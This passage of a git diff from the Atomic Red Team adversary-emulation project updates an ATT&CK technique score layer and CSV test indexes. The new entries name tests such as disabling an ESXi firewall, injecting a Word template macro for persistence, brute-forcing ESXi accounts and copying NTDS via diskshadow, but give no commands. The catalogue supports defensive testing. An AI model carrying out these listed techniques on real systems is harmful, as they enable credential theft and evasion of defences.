Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.015/T1546.015.md"}]},{"techniqueID":"T1547","score":45,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547/T1547.md"}]},{"techniqueID":"T1547.001","score":17,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.001/T1547.001.md"}]},{"techniqueID":"T1547.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.002/T1547.002.md"}]},{"techniqueID":"T1547.003","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.003/T1547.003.md"}]},{"techniqueID":"T1547.004","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.004/T1547.004.md"}]},{"techniqueID":"T1547.005","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.005/T1547.005.md"}]},{"techniqueID":"T1547.006","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.006/T1547.006.md"}]},{"techniqueID":"T1547.007","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.007/T1547.007.md"}]},{"techniqueID":"T1547.008","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.008/T1547.008.md"}]},{"techniqueID":"T1547.009","score":2,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.009/T1547.009.md"}]},{"techniqueID":"T1547.010","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.010/T1547.010.md"}]},{"techniqueID":"T1547.012","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.012/T1547.012.md"}]},{"techniqueID":"T1547.014","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.014/T1547.014.md"}]},{"techniqueID":"T1547.015","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.015/T1547.015.md"}]},{"techniqueID":"T1548","score":42,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548/T1548.md"}]},{"techniqueID":"T1548.001","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md"}]},{"techniqueID":"T1548.002","score":26,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.002/T1548.002.md"}]},{"techniqueID":"T1548.003","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.003/T1548.003.md"}]},{"techniqueID":"T1550","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550/T1550.md"}]},{"techniqueID":"T1550.002","score":3,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.002/T1550.002.md"}]},{"techniqueID":"T1550.003","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.003/T1550.003.md"}]},{"techniqueID":"T1552","score":38,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}]},{"techniqueID":"T1552.001","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"}]},{"techniqueID":"T1552.002","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.002/T1552.002.md"}]},{"techniqueID":"T1552.003","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.003/T1552.003.md"}]},{"techniqueID":"T1552.004","score":14,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"}]},{"techniqueID":"T1552.005","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.005/T1552.005.md"}]},{"techniqueID":"T1552.006","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.006/T1552.006.md"}]},{"techniqueID":"T1552.007","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"}]},{"techniqueID":"T1553","score":13,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553/T1553.md"}]},{"techniqueID":"T1553.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.001/T1553.001.md"}]},{"techniqueID":"T1553.003","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.003/T1553.003.md"}]},{"techniqueID":"T1553.004","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"}]},{"techniqueID":"T1553.005","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.005/T1553.005.md"}]},{"techniqueID":"T1555","score":30,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555/T1555.md"}]},{"techniqueID":"T1555.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.001/T1555.001.md"}]},{"techniqueID":"T1555.003","score":17,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"}]},{"techniqueID":"T1555.004","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.004/T1555.004.md"}]},{"techniqueID":"T1556","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556/T1556.md"}]},{"techniqueID":"T1556.002","score":1,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.002/T1556.002.md"}]},{"techniqueID":"T1556.003","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.003/T1556.003.md"}]},{"techniqueID":"T1557","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1557/T1557.md"}]},{"techniqueID":"T1557.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1557.001/T1557.001.md"}]},{"techniqueID":"T1558","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558/T1558.md"}]},{"techniqueID":"T1558.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.001/T1558.001.md"}]},{"techniqueID":"T1558.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.002/T1558.002.md"}]},{"techniqueID":"T1558.003","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.003/T1558.003.md"}]},{"techniqueID":"T1558.004","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.004/T1558.004.md"}]},{"techniqueID":"T1559","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559/T1559.md"}]},{"techniqueID":"T1559.002","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559.002/T1559.002.md"}]},{"techniqueID":"T1560","score":15,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560/T1560.md"}]},{"techniqueID":"T1560.001","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"}]},{"techniqueID":"T1560.002","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.002/T1560.002.md"}]},{"techniqueID":"T1562","score":118,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562/T1562.md"}]},{"techniqueID":"T1562.001","score":52,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"}]},{"techniqueID":"T1562.002","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md"}]},{"techniqueID":"T1562.003","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"}]},{"techniqueID":"T1562.004","score":23,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"}]},{"techniqueID":"T1562.006","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.006/T1562.006.md"}]},{"techniqueID":"T1562.008","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"}]},{"techniqueID":"T1562.009","score":1,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.009/T1562.009.md"}]},{"techniqueID":"T1562.010","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.010/T1562.010.md"}]},{"techniqueID":"T1563","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563/T1563.md"}]},{"techniqueID":"T1563.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563.002/T1563.002.md"}]},{"techniqueID":"T1564","score":28,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564/T1564.md"}]},{"techniqueID":"T1564.001","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"}]},{"techniqueID":"T1564.002","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.002/T1564.002.md"}]},{"techniqueID":"T1564.003","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.003/T1564.003.md"}]},{"techniqueID":"T1564.004","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md"}]},{"techniqueID":"T1564.006","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.006/T1564.006.md"}]},{"techniqueID":"T1566","score":2,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566/T1566.md"}]},{"techniqueID":"T1566.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/T1566.001.md"}]},{"techniqueID":"T1567","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567/T1567.md"}]},{"techniqueID":"T1567.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567.002/T1567.002.md"}]},{"techniqueID":"T1567.003","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567.003/T1567.003.md"}]},{"techniqueID":"T1569","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569/T1569.md"}]},{"techniqueID":"T1569.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.001/T1569.001.md"}]},{"techniqueID":"T1569.002","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.002/T1569.002.md"}]},{"techniqueID":"T1570","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1570/T1570.md"}]},{"techniqueID":"T1571","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"}]},{"techniqueID":"T1572","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1572/T1572.md"}]},{"techniqueID":"T1573","score":1,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1573/T1573.md"}]},{"techniqueID":"T1574","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574/T1574.md"}]},{"techniqueID":"T1574.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.001/T1574.001.md"}]},{"techniqueID":"T1574.002","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md"}]},{"techniqueID":"T1574.006","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.006/T1574.006.md"}]},{"techniqueID":"T1574.008","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.008/T1574.008.md"}]},{"techniqueID":"T1574.009","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.009/T1574.009.md"}]},{"techniqueID":"T1574.011","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.011/T1574.011.md"}]},{"techniqueID":"T1574.012","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.012/T1574.012.md"}]},{"techniqueID":"T1580","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1580/T1580.md"}]},{"techniqueID":"T1592","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1592/T1592.md"}]},{"techniqueID":"T1592.001","score":1,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1592.001/T1592.001.md"}]},{"techniqueID":"T1606","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1606/T1606.md"}]},{"techniqueID":"T1606.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1606.002/T1606.002.md"}]},{"techniqueID":"T1609","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1609/T1609.md"}]},{"techniqueID":"T1610","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1610/T1610.md"}]},{"techniqueID":"T1611","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1611/T1611.md"}]},{"techniqueID":"T1612","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1612/T1612.md"}]},{"techniqueID":"T1613","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1613/T1613.md"}]},{"techniqueID":"T1614","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1614/T1614.md"}]},{"techniqueID":"T1614.001","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1614.001/T1614.001.md"}]},{"techniqueID":"T1615","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1615/T1615.md"}]},{"techniqueID":"T1619","score":1,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1619/T1619.md"}]},{"techniqueID":"T1620","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1620/T1620.md"}]},{"techniqueID":"T1647","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1647/T1647.md"}]},{"techniqueID":"T1649","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1649/T1649.md"}]},{"techniqueID":"T1654","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1654/T1654.md"}]}]} \ No newline at end of file diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv index 9aef64ae14..170fd6d2cd 100644 --- a/atomics/Indexes/Indexes-CSV/index.csv +++ b/atomics/Indexes/Indexes-CSV/index.csv 
@@ -13,6 +13,7 @@ defense-evasion,T1218.011,Signed Binary Proxy Execution: Rundll32,10,Execution o defense-evasion,T1218.011,Signed Binary Proxy Execution: Rundll32,11,Rundll32 with Ordinal Value,9fd5a74b-ba89-482a-8a3e-a5feaa3697b0,command_prompt defense-evasion,T1218.011,Signed Binary Proxy Execution: Rundll32,12,Rundll32 with Control_RunDLL,e4c04b6f-c492-4782-82c7-3bf75eb8077e,command_prompt defense-evasion,T1218.011,Signed Binary Proxy Execution: Rundll32,13,Rundll32 with desk.cpl,83a95136-a496-423c-81d3-1c6750133917,command_prompt +defense-evasion,T1218.011,Signed Binary Proxy Execution: Rundll32,14,Running DLL with .init extension and function,2d5029f0-ae20-446f-8811-e7511b58e8b6,command_prompt defense-evasion,T1556.003,Modify Authentication Process: Pluggable Authentication Modules,1,Malicious PAM rule,4b9dde80-ae22-44b1-a82a-644bf009eb9c,sh defense-evasion,T1556.003,Modify Authentication Process: Pluggable Authentication Modules,2,Malicious PAM rule (freebsd),b17eacac-282d-4ca8-a240-46602cf863e3,sh defense-evasion,T1556.003,Modify Authentication Process: Pluggable Authentication Modules,3,Malicious PAM module,65208808-3125-4a2e-8389-a0a00e9ab326,sh 
@@ -238,6 +239,7 @@ defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,19, defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,20,LockBit Black - Unusual Windows firewall registry modification -cmd,a4651931-ebbb-4cde-9363-ddf3d66214cb,command_prompt defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,21,LockBit Black - Unusual Windows firewall registry modification -Powershell,80b453d1-eec5-4144-bf08-613a6c3ffe12,powershell defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,22,Blackbit - Disable Windows Firewall using netsh firewall,91f348e6-3760-4997-a93b-2ceee7f254ee,command_prompt +defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,23,ESXi - Disable Firewall via Esxcli,bac8a340-be64-4491-a0cc-0985cb227f5a,command_prompt defense-evasion,T1553.003,Subvert Trust Controls: SIP and Trust Provider Hijacking,1,SIP (Subject Interface Package) Hijacking via Custom DLL,e12f5d8d-574a-4e9d-8a84-c0e8b4a8a675,command_prompt defense-evasion,T1207,Rogue Domain Controller,1,DCShadow (Active Directory),0f4c5eb0-98a0-4496-9c3d-656b4f2bc8f6,powershell defense-evasion,T1610,Deploy a container,1,Deploy Docker container,59aa6f26-7620-417e-9318-589e0fb7a372,bash 
@@ -1082,6 +1084,7 @@ persistence,T1136.002,Create Account: Domain Account,2,Create a new account simi persistence,T1136.002,Create Account: Domain Account,3,Create a new Domain Account using PowerShell,5a3497a4-1568-4663-b12a-d4a5ed70c7d7,powershell persistence,T1136.002,Create Account: Domain Account,4,Active Directory Create Admin Account,562aa072-524e-459a-ba2b-91f1afccf5ab,sh persistence,T1136.002,Create Account: Domain Account,5,Active Directory Create User Account (Non-elevated),8c992cb3-a46e-4fd5-b005-b1bab185af31,sh +persistence,T1137.001,Office Application Startup: Office Template Macros.,1,Injecting a Macro into the Word Normal.dotm Template for Persistence via PowerShell,940db09e-80b6-4dd0-8d4d-7764f89b47a8,powershell persistence,T1546.009,Event Triggered Execution: AppCert DLLs,1,Create registry persistence via AppCert DLL,a5ad6104-5bab-4c43-b295-b4c44c7c6b05,powershell persistence,T1547.015,Boot or Logon Autostart Execution: Login Items,1,Persistence by modifying Windows Terminal profile,ec5d76ef-82fe-48da-b931-bdb25a62bc65,powershell persistence,T1547.015,Boot or Logon Autostart Execution: Login Items,2,Add macOS LoginItem using Applescript,716e756a-607b-41f3-8204-b214baf37c1d,bash 
@@ -1278,6 +1281,7 @@ collection,T1560.001,Archive Collected Data: Archive via Utility,6,Data Compress collection,T1560.001,Archive Collected Data: Archive via Utility,7,Data Compressed - nix - tar Folder or File,7af2b51e-ad1c-498c-aca8-d3290c19535a,sh collection,T1560.001,Archive Collected Data: Archive via Utility,8,Data Encrypted with zip and gpg symmetric,0286eb44-e7ce-41a0-b109-3da516e05a5f,sh collection,T1560.001,Archive Collected Data: Archive via Utility,9,Encrypts collected data with AES-256 and Base64,a743e3a6-e8b2-4a30-abe7-ca85d201b5d3,bash +collection,T1560.001,Archive Collected Data: Archive via Utility,10,ESXi - Remove Syslog remote IP,36c62584-d360-41d6-886f-d194654be7c2,powershell collection,T1113,Screen Capture,1,Screencapture,0f47ceb1-720f-4275-96b8-21f0562217ac,bash collection,T1113,Screen Capture,2,Screencapture (silent),deb7d358-5fbd-4dc4-aecc-ee0054d2d9a4,bash collection,T1113,Screen Capture,3,X Windows Capture,8206dd0c-faf6-4d74-ba13-7fbe13dce6ac,bash 
@@ -1373,6 +1377,7 @@ credential-access,T1110.001,Brute Force: Password Guessing,4,Password Brute User credential-access,T1110.001,Brute Force: Password Guessing,5,SUDO Brute Force - Debian,ba1bf0b6-f32b-4db0-b7cc-d78cacc76700,bash credential-access,T1110.001,Brute Force: Password Guessing,6,SUDO Brute Force - Redhat,4097bc00-5eeb-4d56-aaf9-287d60351d95,bash credential-access,T1110.001,Brute Force: Password Guessing,7,SUDO Brute Force - FreeBSD,abcde488-e083-4ee7-bc85-a5684edd7541,bash +credential-access,T1110.001,Brute Force: Password Guessing,8,ESXi - Brute Force Until Account Lockout,ed6c2c87-bba6-4a28-ac6e-c8af3d6c2ab5,powershell credential-access,T1003,OS Credential Dumping,1,Gsecdump,96345bfc-8ae7-4b6a-80b7-223200f24ef9,command_prompt credential-access,T1003,OS Credential Dumping,2,Credential Dumping with NPPSpy,9e2173c0-ba26-4cdf-b0ed-8c54b27e3ad6,powershell credential-access,T1003,OS Credential Dumping,3,Dump svchost.exe to gather RDP credentials,d400090a-d8ca-4be0-982e-c70598a23de9,powershell 
@@ -1533,6 +1538,7 @@ credential-access,T1003.003,OS Credential Dumping: NTDS,5,Create Volume Shadow C credential-access,T1003.003,OS Credential Dumping: NTDS,6,Create Volume Shadow Copy remotely (WMI) with esentutl,21c7bf80-3e8b-40fa-8f9d-f5b194ff2865,command_prompt credential-access,T1003.003,OS Credential Dumping: NTDS,7,Create Volume Shadow Copy with Powershell,542bb97e-da53-436b-8e43-e0a7d31a6c24,powershell credential-access,T1003.003,OS Credential Dumping: NTDS,8,Create Symlink to Volume Shadow Copy,21748c28-2793-4284-9e07-d6d028b66702,command_prompt +credential-access,T1003.003,OS Credential Dumping: NTDS,9,Create Volume Shadow Copy with diskshadow,b385996c-0e7d-4e27-95a4-aca046b119a7,command_prompt credential-access,T1558.003,Steal or Forge Kerberos Tickets: Kerberoasting,1,Request for service tickets,3f987809-3681-43c8-bcd8-b3ff3a28533a,powershell credential-access,T1558.003,Steal or Forge Kerberos Tickets: Kerberoasting,2,Rubeus kerberoast,14625569-6def-4497-99ac-8e7817105b55,powershell credential-access,T1558.003,Steal or Forge Kerberos Tickets: Kerberoasting,3,Extract all accounts in use as SPN using setspn,e6f4affd-d826-4871-9a62-6c9004b8fe06,command_prompt diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv index 9d30266e31..5856731b37 100644 --- a/atomics/Indexes/Indexes-CSV/windows-index.csv +++ b/atomics/Indexes/Indexes-CSV/windows-index.csv 
@@ -13,6 +13,7 @@ defense-evasion,T1218.011,Signed Binary Proxy Execution: Rundll32,10,Execution o defense-evasion,T1218.011,Signed Binary Proxy Execution: Rundll32,11,Rundll32 with Ordinal Value,9fd5a74b-ba89-482a-8a3e-a5feaa3697b0,command_prompt defense-evasion,T1218.011,Signed Binary Proxy Execution: Rundll32,12,Rundll32 with Control_RunDLL,e4c04b6f-c492-4782-82c7-3bf75eb8077e,command_prompt defense-evasion,T1218.011,Signed Binary Proxy Execution: Rundll32,13,Rundll32 with desk.cpl,83a95136-a496-423c-81d3-1c6750133917,command_prompt +defense-evasion,T1218.011,Signed Binary Proxy Execution: Rundll32,14,Running DLL with .init extension and function,2d5029f0-ae20-446f-8811-e7511b58e8b6,command_prompt defense-evasion,T1216.001,Signed Script Proxy Execution: Pubprn,1,PubPrn.vbs Signed Script Bypass,9dd29a1f-1e16-4862-be83-913b10a88f6c,command_prompt defense-evasion,T1006,Direct Volume Access,1,Read volume boot sector via DOS device path (PowerShell),88f6327e-51ec-4bbf-b2e8-3fea534eab8b,powershell defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,1,Bypass UAC using Event Viewer (cmd),5073adf8-9a50-4bd9-b298-a9bd2ead8af9,command_prompt 
@@ -144,6 +145,7 @@ defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,6,A defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,20,LockBit Black - Unusual Windows firewall registry modification -cmd,a4651931-ebbb-4cde-9363-ddf3d66214cb,command_prompt defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,21,LockBit Black - Unusual Windows firewall registry modification -Powershell,80b453d1-eec5-4144-bf08-613a6c3ffe12,powershell defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,22,Blackbit - Disable Windows Firewall using netsh firewall,91f348e6-3760-4997-a93b-2ceee7f254ee,command_prompt +defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,23,ESXi - Disable Firewall via Esxcli,bac8a340-be64-4491-a0cc-0985cb227f5a,command_prompt defense-evasion,T1553.003,Subvert Trust Controls: SIP and Trust Provider Hijacking,1,SIP (Subject Interface Package) Hijacking via Custom DLL,e12f5d8d-574a-4e9d-8a84-c0e8b4a8a675,command_prompt defense-evasion,T1207,Rogue Domain Controller,1,DCShadow (Active Directory),0f4c5eb0-98a0-4496-9c3d-656b4f2bc8f6,powershell defense-evasion,T1112,Modify Registry,1,Modify Registry of Current User Profile - cmd,1324796b-d0f6-455a-b4ae-21ffee6aa6b9,command_prompt 
